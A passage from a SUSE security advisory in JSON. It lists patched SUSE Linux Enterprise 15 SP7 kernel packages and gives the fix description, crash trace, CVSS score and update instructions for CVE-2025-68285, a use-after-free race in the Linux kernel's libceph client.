"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "important"
}
],
"title": "CVE-2025-68284"
},
{
"cve": "CVE-2025-68285",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68285"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nlibceph: fix potential use-after-free in have_mon_and_osd_map()\n\nThe wait loop in __ceph_open_session() can race with the client\nreceiving a new monmap or osdmap shortly after the initial map is\nreceived. Both ceph_monc_handle_map() and handle_one_map() install\na new map immediately after freeing the old one\n\n kfree(monc-\u003emonmap);\n monc-\u003emonmap = monmap;\n\n ceph_osdmap_destroy(osdc-\u003eosdmap);\n osdc-\u003eosdmap = newmap;\n\nunder client-\u003emonc.mutex and client-\u003eosdc.lock respectively, but\nbecause neither is taken in have_mon_and_osd_map() it\u0027s possible for\nclient-\u003emonc.monmap-\u003eepoch and client-\u003eosdc.osdmap-\u003eepoch arms in\n\n client-\u003emonc.monmap \u0026\u0026 client-\u003emonc.monmap-\u003eepoch \u0026\u0026\n client-\u003eosdc.osdmap \u0026\u0026 client-\u003eosdc.osdmap-\u003eepoch;\n\ncondition to dereference an already freed map. This happens to be\nreproducible with generic/395 and generic/397 with KASAN enabled:\n\n BUG: KASAN: slab-use-after-free in have_mon_and_osd_map+0x56/0x70\n Read of size 4 at addr ffff88811012d810 by task mount.ceph/13305\n CPU: 2 UID: 0 PID: 13305 Comm: mount.ceph Not tainted 6.14.0-rc2-build2+ #1266\n ...\n Call Trace:\n \u003cTASK\u003e\n have_mon_and_osd_map+0x56/0x70\n ceph_open_session+0x182/0x290\n ceph_get_tree+0x333/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n \u003c/TASK\u003e\n\n Allocated by task 13305:\n ceph_osdmap_alloc+0x16/0x130\n ceph_osdc_init+0x27a/0x4c0\n ceph_create_client+0x153/0x190\n create_fs_client+0x50/0x2a0\n ceph_get_tree+0xff/0x680\n vfs_get_tree+0x49/0x180\n do_new_mount+0x1a3/0x2d0\n path_mount+0x6dd/0x730\n do_mount+0x99/0xe0\n __do_sys_mount+0x141/0x180\n do_syscall_64+0x9f/0x100\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n\n Freed by task 9475:\n kfree+0x212/0x290\n handle_one_map+0x23c/0x3b0\n ceph_osdc_handle_map+0x3c9/0x590\n mon_dispatch+0x655/0x6f0\n ceph_con_process_message+0xc3/0xe0\n ceph_con_v1_try_read+0x614/0x760\n ceph_con_workfn+0x2de/0x650\n process_one_work+0x486/0x7c0\n process_scheduled_works+0x73/0x90\n worker_thread+0x1c8/0x2a0\n kthread+0x2ec/0x300\n ret_from_fork+0x24/0x40\n ret_from_fork_asm+0x1a/0x30\n\nRewrite the wait loop to check the above condition directly with\nclient-\u003emonc.mutex and client-\u003eosdc.lock taken as appropriate. While\nat it, improve the timeout handling (previously mount_timeout could be\nexceeded in case wait_event_interruptible_timeout() slept more than\nonce) and access client-\u003eauth_err under client-\u003emonc.mutex to match\nhow it\u0027s set in finish_auth().\n\nmonmap_show() and osdmap_show() now take the respective lock before\naccessing the map as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68285",
"url": "https://www.suse.com/security/cve/CVE-2025-68285"
},
{
"category": "external",
"summary": "SUSE Bug 1255401 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255401"
},
{
"category": "external",
"summary": "SUSE Bug 1255402 for CVE-2025-68285",
"url": "https://bugzilla.suse.com/1255402"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
